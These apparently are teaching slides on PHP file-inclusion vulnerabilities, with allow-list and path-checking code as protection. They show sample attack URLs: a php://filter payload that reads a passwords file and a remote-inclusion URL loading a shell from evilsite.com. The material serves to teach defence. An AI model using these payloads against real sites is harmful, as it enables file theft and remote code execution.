Web Vuln 02
http://shmt.anapnea.net/lfitest/index.php?page=about.php
• In the worst case scenario, any file from the website or even the server can be read (depends on the OS and webserver config).
http://shmt.anapnea.net/lfitest/index.php?page=php://filter/convert.base64-encode/resource=passwords.php
http://shmt.anapnea.net/lfitest/index.php?page=http://evilsite.com/shell.txt
• Usually used to include shells – programs made to make further attacking easier.
Protecting from LFI
• Don't take the included file name dynamically from the request.
• If that is impossible, restrict the parameter to a hard-coded allow-list of values:
<?php
$file  = $_GET['page'] ?? 'index.php';            // default avoids an undefined-index notice
$check = array('index.php', 'new.php', 'guestbook.php');   // the only files that may be included
if (in_array($file, $check, true)) {              // strict comparison: no type juggling
    include($file);
} else {
    include('index.php');                         // anything not on the list falls back to the default
}
?>
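The allow-list idea from the slide, carried one step further as an added example (not code from the original slides): the client supplies a short key, the key is mapped to a file name server-side, and the resolved path is checked to lie inside a fixed pages directory. Because only map values ever reach include(), inputs such as php://filter/... or a remote URL are rejected before any file is opened, and rejected keys are logged as a signal worth watching. The directory name `pages/`, the page map and the function name `resolve_page` are assumptions for this example.

```php
<?php
declare(strict_types=1);

// Assumed layout for this example: every includable page lives in ./pages/
const PAGE_DIR = __DIR__ . '/pages';

// Permitted keys and the files they map to. The key is all the client ever supplies;
// the file name itself never comes from the request.
const PAGES = [
    'index'     => 'index.php',
    'about'     => 'about.php',
    'guestbook' => 'guestbook.php',
];

/**
 * Resolve a client-supplied page key to a path that is safe to include.
 * Returns null when the key is unknown or the resolved path is not inside PAGE_DIR.
 */
function resolve_page(string $key): ?string
{
    // Strict lookup: no type juggling, no partial matches, no wrappers or URLs.
    if (!array_key_exists($key, PAGES)) {
        return null;
    }

    $base = realpath(PAGE_DIR);
    $path = realpath(PAGE_DIR . '/' . PAGES[$key]);

    // Defence in depth: even a mistake in the map cannot pull in a file
    // outside the pages directory (realpath resolves ../ and symlinks).
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

$key  = (string) ($_GET['page'] ?? 'index');
$path = resolve_page($key);

if ($path === null) {
    // Unknown key: log it (a useful LFI/RFI probe indicator) and fall back to the default page.
    error_log(sprintf('rejected page parameter from %s: %s',
        $_SERVER['REMOTE_ADDR'] ?? 'unknown', $key));
    $path = resolve_page('index');
    if ($path === null) {
        http_response_code(500);
        exit('default page missing');
    }
}

include $path;
```

Requesting index.php?page=about includes pages/about.php; any other value of `page`, including stream wrappers, absolute paths, or URLs, is never passed to include() and shows up in the error log instead.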
Any questions?